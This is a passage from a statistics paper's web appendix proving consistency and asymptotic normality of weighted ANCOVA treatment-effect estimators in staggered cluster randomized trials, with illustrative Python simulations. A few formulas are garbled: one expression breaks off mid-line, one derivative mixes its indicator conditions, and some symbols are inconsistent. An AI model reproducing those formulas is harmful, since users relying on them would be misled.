\[\xrightarrow{p}\left(\begin{array}{cc}\frac{1}{e_{j}\omega_{j}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&(e_{j}\mathbf{\Sigma}_{\mathbf{X},j})^{-1}\end{array}\right)\left(\begin{array}{c}e_{j}\mu_{j}^{*}(1)\\ e_{j}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1)\end{array}\right)=\left(\begin{array}{c}\frac{1}{\omega_{j}}\mu_{j}^{*}(1)\\ \mathbf{\eta}_{j}^{**}\end{array}\right),\]
where
\[\mathbf{\eta}_{j}^{**}=\mathbf{\Sigma}_{\mathbf{X},j}^{-1}\mathbf{\Sigma}_{\mathbf{X},Y,j}(1).\]
Thus,
\[\widehat{\tau}_{j}^{*}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}.\]
Similarly,
\[\left(\begin{array}{c}\widehat{\beta}_{j}\\ \widehat{\mathbf{\gamma}}_{j}\end{array}\right)\xrightarrow{p}\left(\begin{array}{cc}\frac{1}{(1-e_{j})\omega_{j}}&\mathbf{0}_{p}^{\prime}\\ \mathbf{0}_{p}&((1-e_{j})\mathbf{\Sigma}_{\mathbf{X},j})^{-1}\end{array}\right)\left(\begin{array}{c}(1-e_{j})\mu_{j}^{*}(0)\\ (1-e_{j})\mathbf{\Sigma}_{\mathbf{X},Y,j}(0)\end{array}\right)=\left(\begin{array}{c}\frac{1}{\omega_{j}}\mu_{j}^{*}(0)\\ \mathbf{\gamma}_{j}^{*}\end{array}\right),\]
where
\[\mathbf{\gamma}_{j}^{*}=\mathbf{\Sigma}_{\mathbf{X},j}^{-1}\mathbf{\Sigma}_{\mathbf{X},Y,j}(0).\]
Thus,
\[\widehat{\beta}_{j}\xrightarrow{p}\frac{\mu_{j}^{*}(0)}{\omega_{j}},\]
and we have
\[\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{*}-\widehat{\beta}_{j}\xrightarrow{p}\frac{\mu_{j}^{*}(1)}{\omega_{j}}-\frac{\mu_{j}^{*}(0)}{\omega_{j}}.\]

### Web Appendix A2.2 Proof of asymptotic normality

We prove the asymptotic normality based on Theorem 2 of Schochet et al. (2021) and Theorem 4 of Li and Ding (2017). We first show asymptotic normality assuming the covariate parameters are obtained from the full schedule of potential outcomes and are constant within each treatment arm.
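The displays that follow define these full-schedule covariate parameters for each working model. As a schematic illustration of the distinction between a full-schedule parameter and its estimated counterpart, the sketch below uses hypothetical one-period data with unit weights and a common assignment probability; the data-generating values and the helper `coef` are ours and are not taken from the paper or its simulations.

```python
import numpy as np

rng = np.random.default_rng(1)

def coef(D, y):
    """Ordinary least-squares coefficients of y on the columns of D."""
    return np.linalg.lstsq(D, y, rcond=None)[0]

e = 0.5  # assignment probability in this hypothetical one-period setting
for I in (50, 500, 5000):
    X = rng.normal(size=(I, 2))
    Xc = X - X.mean(axis=0)                      # centered covariates
    Y0 = Xc @ np.array([0.4, -0.2]) + rng.normal(size=I)
    Y1 = Y0 + 1.0 + 0.3 * Xc[:, 0]               # full schedule of potential outcomes

    # Full-schedule parameter: projection of e*Y(1) + (1-e)*Y(0) on the covariates.
    gamma = coef(Xc, e * Y1 + (1 - e) * Y0)

    # Estimated parameter: covariate coefficients from regressing the observed
    # outcome on (intercept, treatment, covariates) under one random assignment.
    Z = rng.binomial(1, e, size=I)
    Y_obs = np.where(Z == 1, Y1, Y0)
    gamma_hat = coef(np.column_stack([np.ones(I), Z, Xc]), Y_obs)[2:]

    print(I, np.round(gamma, 3), np.round(gamma_hat, 3))
```

As the number of units grows, the estimated coefficients approach the full-schedule projection coefficient, which is the substitution argument used at the end of this section.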
Specifically, for ANCOVA I, \[\mathbf{\gamma}=\left(\sum_{j=1}^{J}\mathbf{S}_{\mathbf{X},j}\right)^{-1} \left(\sum_{j=1}^{J}e_{j}\mathbf{S}_{\mathbf{X},Y,j}(1)+\sum_{j=1}^{J}(1-e_{j})\mathbf{S}_ {\mathbf{X},Y,j}(0)\right);\] for ANCOVA II, \[\mathbf{\gamma}_{j}=\left(\mathbf{S}_{\mathbf{X},j}\right)^{-1}\left(e_{j}\mathbf{S}_{\mathbf{X}, Y,j}(1)+(1-e_{j})\mathbf{S}_{\mathbf{X},Y,j}(0)\right);\] for ANCOVA III, \[\mathbf{\eta}^{*}=\left(\sum_{j=1}^{J}e_{j}\mathbf{S}_{\mathbf{X},j}\right)^{ -1}\left(\sum_{j=1}^{J}e_{j}\mathbf{S}_{\mathbf{X},Y,j}(1)\right),\ \mathbf{\gamma}=\left(\sum_{j=1}^{J}(1-e_{j})\mathbf{S}_{\mathbf{X},j}\right)^{-1}\left( \sum_{j=1}^{J}(1-e_{j})\mathbf{S}_{\mathbf{X},Y,j}(0)\right);\] and for ANCOVA IV, \[\mathbf{\eta}_{j}^{*}=\mathbf{S}_{\mathbf{X},j}^{-1}\mathbf{S}_{\mathbf{X},Y,j}(1),\ \mathbf{\gamma}_{j}=\mathbf{S}_{\mathbf{X},j}^{-1}\mathbf{S}_{\mathbf{X},Y,j}(0).\] After establishing asymptotic normality with full schedule parameters, \(\mathbf{\gamma}\), \(\mathbf{\gamma}_{j}\), \(\mathbf{\eta}^{*}\), \(\mathbf{\eta}_{j}^{*}\), we show that those with estimated parameters, \(\widehat{\mathbf{\gamma}}\), \(\widehat{\mathbf{\gamma}}_{j}\), \(\widehat{\mathbf{\eta}}^{*}\), \(\widehat{\mathbf{\eta}}_{j}^{*}\), converge to the same distribution. #### Web Appendix A2.2.1 Asymptotic normality with known covariate parameters For the estimand, we have \(\overline{\mathbf{Y}}^{a}=\left(\overline{Y}_{1}^{a},\ldots,\overline{Y}_{J}^{a} \right)^{\prime}\), where \[\overline{Y}_{j}^{a}=\frac{\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}^{a}}{\sum_{i =1}^{I}w_{ij}}=\frac{I^{-1}\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}^{a}}{I^{-1} \sum_{i=1}^{I}w_{ij}}=\frac{\overline{w}\overline{Y}_{j}^{a}}{\overline{w}_{j }},\] and \[\overline{Y}_{j}(1)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j \}w_{j}\overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}w_{j}} =\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}\overline{Y}_{j}^{a}}{\sum_{ a\in\mathcal{A}}\mathbb{I}\{a\leq j\}},\ \ \overline{Y}_{j}(0)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}w_{j} \overline{Y}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}w_{j}}=\frac{ \sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\overline{Y}_{j}^{a}}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a>j\}}.\] We can write the estimand as \[\tau=\sum_{j=1}^{J}\sum_{a\in\mathcal{A}}B_{j}^{a}\overline{Y}_{j}^{a},\] where \[B_{j}^{a}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{ I}\{a\leq j\}\varphi_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\} \varphi_{a}}-\frac{\mathbb{I}\{a>j\}\varphi_{a}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}\varphi_{a}}\right\}.\] If we choose \(\varphi_{a}=I_{a}\), then \[B_{j}^{a}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{ I}\{a\leq j\}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}}-\frac{ \mathbb{I}\{a>j\}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a}}\right\}.\] Our estimator for the weighted average treatment effect is \[\widehat{\tau}=\frac{\sum_{j=1}^{J}w_{j}\widehat{\tau}_{j}}{\sum_{j=1}^{J}w_{ j}},\ \ \widehat{\tau}_{j}=\overline{u}_{j}(1)-\overline{u}_{j}(0).\] Specifically, \(\overline{\mathbf{u}}^{a}=(\overline{u}_{1}^{a},\ldots,\overline{u}_{J}^{a})^{\prime}\), where \[\overline{u}_{j}^{a}=\frac{\sum_{i=1}^{I}w_{ij}G_{ia}\overline{ U}_{ij}^{a}}{\sum_{i=1}^{I}w_{ij}G_{ia}},\] and \[\overline{u}_{j}(1)=\frac{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j \}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)\overline{u}_{j}^{a}}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)},\ \ 
\overline{u}_{j}(0)=\frac{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)\overline{u}_{j}^{a}}{ \sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\left(\sum_{i=1}^{I}w_{ij}G_{ia}\right)}.\] We can then write the estimator as \[\widehat{\tau}=\sum_{j=1}^{J}\sum_{a\in\mathcal{A}}b_{j}^{a}\overline{u}_{j}^{ a},\] where \[b_{j}^{a}=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{ I}\{a\leq j\}\left(I_{a}I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia}\right)}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}\left(I_{a}I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia} \right)}-\frac{\mathbb{I}\{a>j\}\left(I_{a}I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia} \right)}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}\left(I_{a}I_{a}^{-1}\sum_{i=1 }^{I}w_{ij}G_{ia}\right)}\right\}\] \[=\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left\{\frac{\mathbb{I}\{a\leq j\}I_{a} \overline{w}_{j}^{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}\overline {w}_{j}^{a}}-\frac{\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}}\right\}.\] Define intermediate quantities with known covariate parameters (recall Lemma 1): for ANCOVA I, \[\widetilde{U}_{ij}^{a}=\overline{Y}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\mathbf{\gamma};\] for ANCOVA II, \[\widetilde{U}_{ij}^{a}=\overline{Y}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\mathbf{\gamma }_{j};\] for ANCOVA III, \[\widetilde{U}_{ij}^{a}=\overline{Y}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\left( \mathbb{I}\{a\leq j\}\mathbf{\eta}^{*}+\mathbb{I}\{a>j\}\mathbf{\gamma}\right);\] and for ANCOVA IV, \[\overline{U}_{ij}^{a}=\overline{Y}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\left( \mathbb{I}\{a\leq j\}\mathbf{\eta}_{j}^{*}+\mathbb{I}\{a>j\}\mathbf{\gamma}_{j}\right).\] We also have the following quantities \[\widetilde{u}_{j}^{a}=\frac{\sum_{i=1}^{J}w_{ij}G_{ia}\widetilde{U}_{ij}^{a}} {\sum_{i=1}^{J}w_{ij}G_{ia}}=\frac{I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia} \widetilde{U}_{ij}^{a}}{I_{a}^{-1}\sum_{i=1}^{I}w_{ij}G_{ia}}=\frac{w\widetilde {u}_{j}^{a}}{\overline{w}_{j}^{a}},\] and \[\widetilde{U}_{j}^{a}=\frac{\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}^{a}}{\sum_ {i=1}^{I}w_{ij}}=\frac{I^{-1}\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}^{a}}{I^{- 1}\sum_{i=1}^{I}w_{ij}}=\frac{w\widetilde{U}_{j}^{a}}{\overline{w}_{j}}.\] Let \(\overline{\mathbf{t}}^{a}=(w\widetilde{u}_{1}^{a},\ldots,w\widetilde{u}_{J}^{a}, \overline{w}_{1}^{a},\ldots,\overline{w}_{J}^{a})^{\prime}\), and \(\overline{\mathbf{T}}^{a}=(w\widetilde{U}_{1}^{a},\ldots,w\widetilde{U}_{J}^{a}, \overline{w}_{1},\ldots,\overline{w}_{J})^{\prime}\), with \(\overline{\mathbf{T}}_{i}^{a}=(w_{i1}\widetilde{U}_{i1}^{a},\ldots,w_{iJ} \widetilde{U}_{iJ}^{a},\)\(w_{i1},\ldots,w_{iJ}\)\(\widetilde{U}_{iJ}^{a} 2. Define \[m_{j}(w)=\max_{1\leq i\leq I}\left(w_{ij}-\overline{w}_{j}\right)^{2},\;\text{ and }\;\;v_{j}(w)=\frac{1}{I-1}\sum_{i=1}^{I}\left(w_{ij}-\overline{w}_{j}\right)^{2},\] and as \(I\to\infty\), \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{j}(w)}{I_{a}v_{j}(w)}\to 0.\] Then, by Theorem 4 of Li and Ding (2017), we have, as \(I\to\infty\), \[\left(\overline{\mathbf{t}}^{1}\left[\text{diag}\left\{\text{cov}\left(\overline{ \mathbf{t}}^{1}\right)\right\}\right]^{-1/2},\cdots,\overline{\mathbf{t}}^{J+1}\left[ \text{diag}\left\{\text{cov}\left(\overline{\mathbf{t}}^{J+1}\right)\right\} \right]^{-1/2}\right)\xrightarrow{d}\mathcal{N}\left(\mathbf{0}_{(J+1)\times 2J},\mathbf{R}_{T} \right),\] where \(\mathbf{R}_{T}\) is a correlation matrix. 
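The vector CLT invoked above can be visualized with a small randomization simulation. The sketch below is a toy check of the scalar case only: it repeatedly draws a simple random assignment from a fixed finite population of clusters and standardizes the resulting sample mean of the weighted values using the usual finite-population variance; all numbers are hypothetical and the code is not part of the paper's analysis.

```python
import numpy as np

rng = np.random.default_rng(2)

# Fixed finite population of I clusters; randomization distribution of the mean of
# the weighted values over I_a randomly "assigned" clusters (hypothetical numbers).
I, I_a, reps = 200, 80, 20000
w = rng.uniform(5, 30, size=I)
U = rng.gamma(shape=2.0, size=I)        # deliberately skewed cluster-level values
wU = w * U

draws = np.empty(reps)
for r in range(reps):
    idx = rng.choice(I, size=I_a, replace=False)   # simple random assignment
    draws[r] = wU[idx].mean()

# Finite-population mean and variance of a sample mean without replacement.
mu = wU.mean()
var = (1 / I_a - 1 / I) * np.var(wU, ddof=1)
z = (draws - mu) / np.sqrt(var)
print(z.mean(), z.var(), np.mean(np.abs(z) < 1.96))   # approximately 0, 1, and 0.95
```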
Define \(\widetilde{\tau}_{j}^{w}=h_{j}(\overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t} }^{J+1})\), and \[\left(\begin{array}{c}\widetilde{\tau}_{1}^{w}\\ \vdots\\ \widetilde{\tau}_{J}^{w}\end{array}\right)=\left(\begin{array}{c}h_{1}( \overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t}}^{J+1})\\ \vdots\\ h_{J}(\overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t}}^{J+1})\end{array}\right)= \mathbf{h}(\overline{\mathbf{t}}),\] where \[h_{j}(\overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t}}^{J+1})=\frac{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}w\widetilde{w}_{j}^{a}}{\sum_{a\in \mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}\overline{w}_{j}^{a}}-\frac{\sum_{a\in \mathcal{A}}\mathbb{I}\{a>j\}I_{a}w\widetilde{w}_{j}^{a}}{\sum_{a\in\mathcal{A} }\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}}.\] The gradient is \[\nabla h_{j}(\overline{\mathbf{t}}^{1},\ldots,\overline{\mathbf{t}}^{J+1})=\nabla h_ {j}(\overline{\mathbf{t}})=\left(\nabla_{\overline{\mathbf{t}}^{1}}h_{j}^{\prime}, \ldots,\nabla_{\overline{\mathbf{t}}^{J+1}}h_{j}^{\prime}\right)^{\prime},\] where \(\nabla_{\overline{\mathbf{t}}^{\ast}}h_{j}\) is a \(2J\)-dimensional vector with the \(j\)-th and the \((J+j)\)-th entries being nonzero, and zeros anywhere else. Specifically, the \(j\)-th entry is the partial derivative of \(h_{j}\) with respect to \(w\widetilde{w}_{j}^{a}\), which is \[\frac{\mathbb{I}\{a\leq j\}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\} I_{a}\overline{w}_{j}^{a}}-\frac{\mathbb{I}\{a>j\}I_{a}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}},\] and the \((J+j)\)-th entry is the partial derivative of \(h_{j}\) with respect to \(\overline{w}_{j}^{a}\), which is \[-\frac{\mathbb{I}\{a\leq j\}I_{a}\left(\sum_{a\in\mathcal{A}} \mathbb{I}\{a\leq j\}I_{a}w\widetilde{w}_{j}^{a}\right)}{\left(\sum_{a\in \mathcal{A}}\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{a}\right)^{2}}+\frac{ \mathbb{I}\{a>j\}I_{a}\left(\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a} \overline{w}_{j}^{a}\right)}{\left(\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a }\overline{w}_{j}^{a}\right)^{2}}.\] When evaluated at \((\overline{\mathbf{T}}^{1},\ldots,\overline{\mathbf{T}}^{J+1})\), these two entries become \[\frac{\mathbb{I}\{a\leq j\}I_{a}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\} I_{a}\overline{w}_{j}}-\frac{\mathbb{I}\{a>j\}I_{a}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a>j\}I_{a}\overline{w}_{j}},\text{ and }-\frac{\mathbb{I}\{a\leq j\}I_{a}w \widetilde{U}_{j}(1)}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a} \overline{w}_{j}^{2}}+\frac{\mathbb{I}\{a>j\}I_{a}w\widetilde{U}_{j}(0)}{\sum_{ a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}^{2}}.\] This is because for all \(a\leq j\)\((a>j)\), \(w\widetilde{U}_{j}^{a}=w\widetilde{U}_{j}(1)\)\((w\widetilde{U}_{j}^{a}=w\widetilde{U}_{j}(0))\). Define \[\mathbf{\nabla h}(\overline{\mathbf{t}})=\left(\begin{array}{c}\nabla h_{1}( \overline{\mathbf{t}})\\ \vdots\\ \nabla h_{J}(\overline{\mathbf{t}})\end{array}\right),\text{ and }\mathbf{\nabla h}(\overline{\mathbf{T}})=\left( \begin{array}{c}\nabla h_{1}(\overline{\mathbf{T}})\\ \vdots\\ \nabla h_{J}(\overline{\mathbf{T}})\end{array}\right).\] Assuming that \(\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(1)\neq 0\) or \(\sum_{i=1}^{I}w_{ij}\widetilde{U}_{ij}(0)\neq 0\), for some \(j\), these derivatives are all continuous for a specific \(a\) and \(j\). 
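Each \(h_{j}\) is a difference of two ratios of sample means, so the next step applies the finite-population delta method to these ratio statistics. As a sanity check of that approximation in the simplest possible case, the following sketch (hypothetical numbers, a single ratio rather than the full vector \(\mathbf{h}\), and our own variable names) compares the delta-method variance of a ratio of sample means with its randomization variance.

```python
import numpy as np

rng = np.random.default_rng(3)

# Finite population of I cluster-level (numerator, denominator) pairs; compare the
# delta-method variance of a ratio of sample means with its randomization variance.
I, n, reps = 500, 100, 20000
num = rng.normal(2.0, 1.0, size=I)
den = rng.uniform(5.0, 15.0, size=I)

Num, Den = num.mean(), den.mean()
grad = np.array([1 / Den, -Num / Den**2])              # gradient of h(x, y) = x / y
S = np.cov(np.vstack([num, den]), ddof=1)              # finite-population covariance
cov_means = (1 / n - 1 / I) * S                        # covariance of the two sample means
var_delta = grad @ cov_means @ grad

draws = np.empty(reps)
for r in range(reps):
    idx = rng.choice(I, size=n, replace=False)         # simple random assignment
    draws[r] = num[idx].mean() / den[idx].mean()

print(var_delta, draws.var())                          # the two variances should be close
```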
Therefore, using the finite population delta method by Pashley (2022), we have \[\left\{\mathbf{h}(\overline{\mathbf{t}})-\mathbf{h}(\overline{\mathbf{T}})\right\}\left\{\mathbf{ \nabla h}(\overline{\mathbf{T}})\mathbf{V}_{T}\mathbf{R}_{T}\mathbf{V}_{T}\mathbf{\nabla h}(\overline {\mathbf{T}})^{\prime}\right\}^{-1/2}\xrightarrow{d}\mathcal{N}(0,\mathbf{I}_{J}),\] where \[\mathbf{V}_{T}=\otimes_{a}\left[\operatorname{diag}\left\{\operatorname{ cov}\left(\overline{\mathbf{t}}^{a}\right)\right\}\right]^{-1/2}.\] Further define \[\mathbf{\Sigma}_{T}=\mathbf{V}_{T}\mathbf{R}_{T}\mathbf{V}_{T},\ \ \text{and}\ \ \mathbf{\Sigma}_{\tau^{w}}=\mathbf{ \nabla}\mathbf{h}(\overline{\mathbf{T}})\mathbf{V}_{T}\mathbf{R}_{T}\mathbf{V}_{T}\mathbf{\nabla}\mathbf{h }(\overline{\mathbf{T}})^{\prime},\] then since \[\mathbf{\nabla}\mathbf{h}(\overline{\mathbf{T}})=\left(\begin{array}{c}\nabla h_{1}( \overline{\mathbf{T}})\\ \vdots\\ \nabla h_{J}(\overline{\mathbf{T}})\end{array}\right)=\left(\begin{array}{ccc} \nabla h_{1}^{1}(\overline{\mathbf{T}})&\cdots&\nabla h_{1}^{J+1}(\overline{\mathbf{T }})\\ \vdots&&\vdots\\ \nabla h_{J}^{1}(\overline{\mathbf{T}})&\cdots&\nabla h_{J}^{J+1}(\overline{\mathbf{T }})\end{array}\right)=\left(\begin{array}{ccc}\mathbf{\nabla}\mathbf{h}^{1}( \overline{\mathbf{T}})&\cdots&\mathbf{\nabla}\mathbf{h}^{J+1}(\overline{\mathbf{T}})\end{array} \right),\] we have \[\mathbf{\Sigma}_{\tau^{w}}=\sum_{a,a^{\prime}\in\mathcal{A}}\mathbf{\nabla}\mathbf{h}^{a}( \overline{\mathbf{T}})\text{cov}\left(\overline{\mathbf{t}}^{a},\overline{\mathbf{t}}^{a^ {\prime}}\right)\mathbf{\nabla}\mathbf{h}^{a^{\prime}}(\overline{\mathbf{T}})^{\prime}.\] To facilitate further derivations, we define the following \[\mathbf{U}_{i}^{a}= \left(\overline{\mathbf{U}}_{i}(1)-\overline{\mathbf{U}}(1)\right)\left( \otimes_{j=1}^{J}\mathbb{I}\{a\leq j\}\right)+\left(\overline{\mathbf{U}}_{i}(0)- \overline{\mathbf{U}}(0)\right)\left(\otimes_{j=1}^{J}\mathbb{I}\{a>j\}\right)\] \[= \left(\begin{array}{c}\overline{U}_{i1}(1)-\overline{U}_{1}(1) \\ \vdots\\ \overline{U}_{iJ}(1)-\overline{U}_{J}(1)\end{array}\right)\left(\begin{array}[] {c}\mathbb{I}\{a\leq 1\}\\ \ddots\\ \mathbb{I}\{a\leq J\}\end{array}\right)+\left(\begin{array}{ccc}\overline{U }_{i1}(0)-\overline{U}_{1}(0)\\ \vdots\\ \overline{U}_{iJ}(0)-\overline{U}_{J}(0)\end{array}\right)\left(\begin{array}[] {c}\mathbb{I}\{a>1\}\\ \ddots\\ \mathbb{I}\{a>J\}\end{array}\right),\] and \[\widetilde{\mathbf{W}}_{i}^{a}= \otimes_{j=1}^{J}\left(\frac{\mathbb{I}\{a\leq j\}I_{a}w_{ij}}{ \sum_{a\in\mathcal{A}}\mathbb{I}\{a\leq j\}I_{a}\overline{w}_{j}}-\frac{ \mathbb{I}\{a>j\}I_{a}w_{ij}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a} \overline{w}_{j}}\right)\] \[= \otimes_{j=1}^{J}\left(\frac{I_{a}w_{ij}}{\sum_{a\in\mathcal{A}} \mathbb{I}\{a\leq j\}I_{a}\overline{w}_{j}}\mathbb{I}\{a\leq j\}-\frac{I_{a}w_ {ij}}{\sum_{a\in\mathcal{A}}\mathbb{I}\{a>j\}I_{a}\overline{w}_{j}}\mathbb{I} \{a>j\}\right)\] \[= \otimes_{j=1}^{J}\left(\frac{I_{a}w_{ij}}{I_{j}\overline{w}_{j}} \mathbb{I}\{a\leq j\}-\frac{I_{a}w_{ij}}{(I-I_{j})\overline{w}_{j}}\mathbb{I} \{a>j\}\right).\] Then, in a finite population, for \(a=a^{\prime}\), \[\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T}})\text{cov}\left(\overline{\mathbf{t}}^{a }\right)\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T}})^{\prime}=\left(\frac{1}{I_{a} }-\frac{1}{I}\right)\frac{1}{I-1}\sum_{i=1}^{I}\mathbf{U}_{i}^{a}\widetilde{\mathbf{W} }_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\mathbf{U}_{i}^{a^{\prime}},\] and for \(a\neq a^{\prime}\), 
\[\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T}})\text{cov}\left(\overline{\mathbf{t}}^{a },\overline{\mathbf{t}}^{a^{\prime}}\right)\mathbf{\nabla}\mathbf{h}^{a^{\prime}}( \overline{\mathbf{T}})^{\prime}=-\frac{1}{I}\frac{1}{I-1}\sum_{i=1}^{I}\mathbf{U}_{i}^ {a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a^{\prime}}\mathbf{U}_{i}^{a ^{\prime}}.\] Therefore, we have the finite population covariance matrix for \((\widetilde{\tau}_{1}^{w},\ldots,\widetilde{\tau}_{J}^{w})^{\prime}\), \[\mathbf{\Sigma}_{\tau^{w}}= \sum_{a\in\mathcal{A}}\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T}}) \text{cov}\left(\overline{\mathbf{t}}^{a}\right)\mathbf{\nabla}\mathbf{h}^{a}(\overline{ \mathbf{T}})^{\prime}+\sum_{a\neq a^{\prime}}\mathbf{\nabla}\mathbf{h}^{a}(\overline{\mathbf{T} })\text{cov}\left(\overline{\mathbf{t}}^{a},\overline{\mathbf{t}}^{a^{\prime}}\right) \mathbf{\nabla}\mathbf{h}^{a^{\prime}}(\overline{\mathbf{T}})^{\prime}\] \[= \sum_{a\in\mathcal{A}}\left(\frac{1}{I_{a}}-\frac{1}{I}\right)\frac {1}{I-1}\sum_{i=1}^{I}\mathbf{U}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W} }_{i}^{a}\mathbf{U}_{i}^{a^{\prime}}-\sum_{a\neq a^{\prime}}\frac{1}{I}\frac{1}{I-1 }\sum_{i=1}^{I}\mathbf{U}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a ^{\prime}}\mathbf{U}_{i}^{a^{\prime}}\] \[= \sum_{a\in\mathcal{A}}\frac{1}{I_{a}}\frac{1}{I-1}\sum_{i=1}^{I} \mathbf{U}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\mathbf{U}_{i}^{a^{ \prime}}-\sum_{a,a^{\prime}\in\mathcal{A}}\frac{1}{I}\frac{1}{I-1}\sum_{i=1}^{I} \mathbf{U}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a^{\prime}}\mathbf{U}_{i }^{a^{\prime}}\] \[= \sum_{a\in\mathcal{A}}\frac{1}{I_{a}}\mathbf{S}_{T}^{a}-\sum_{a,a^{ \prime}\in\mathcal{A}}\frac{1}{I}\mathbf{S}_{T}^{a,a^{\prime}}.\] Define \[\widetilde{\tau}^{w}=\sum_{j=1}^{J}\frac{w_{j}}{\sum_{j=1}^{J}w_{j}} \widetilde{\tau}_{j}^{w}=\sum_{j=1}^{J}\varpi_{j}\widetilde{\tau}_{j}^{w}= \mathbf{\varpi}^{\prime}\mathbf{h}(\overline{\mathbf{t}}),\] and since, \[\tau^{w}=\sum_{j=1}^{J}\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\tau_{j}^{ w}=\sum_{j=1}^{J}\varpi_{j}\tau_{j}^{w}=\mathbf{\varpi}^{\prime}\mathbf{h}(\overline{ \mathbf{T}}),\] we have, as \(I\rightarrow\infty\), \[\frac{\widetilde{\tau}^{w}-\tau^{w}}{\sqrt{\mathbf{\varpi}^{\prime} \mathbf{\Sigma}_{\tau}\mathbf{\varpi}}}\xrightarrow{d}\mathcal{N}\left(0,1\right).\] #### Web Appendix A2.2.2 Asymptotic normality with estimated covariate parameters Assume the following conditions for \(a\in\mathcal{A}\) and \(j\in\{1,\ldots,J\}\): 1. Define \[m_{jl}(\widetilde{\mathbf{X}})=\max_{1\leq i\leq I}\left(\frac{w_{ ij}}{\overline{w}_{j}}[\widetilde{\mathbf{X}}_{ij}]_{l}\right)^{2},\ \ \text{and}\ \ v_{jl}(\widetilde{\mathbf{X}})=\frac{1}{I-1}\sum_{i=1}^{I}\frac{w_{ ij}^{2}}{\overline{w}_{j}^{2}}[\widetilde{\mathbf{X}}_{ij}]_{l}^{2},\] for \(l\in\{1,\ldots,p\}\), and as \(I\rightarrow\infty\), \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{jl}(\widetilde{ \mathbf{X}})}{I_{a}v_{jl}(\widetilde{\mathbf{X}})}\to 0.\] For the asymptotic distribution of \(\widehat{\tau}^{w}\), under conditions (ii) and (iii), by Lemma A.1.1 of Schochet et al. 
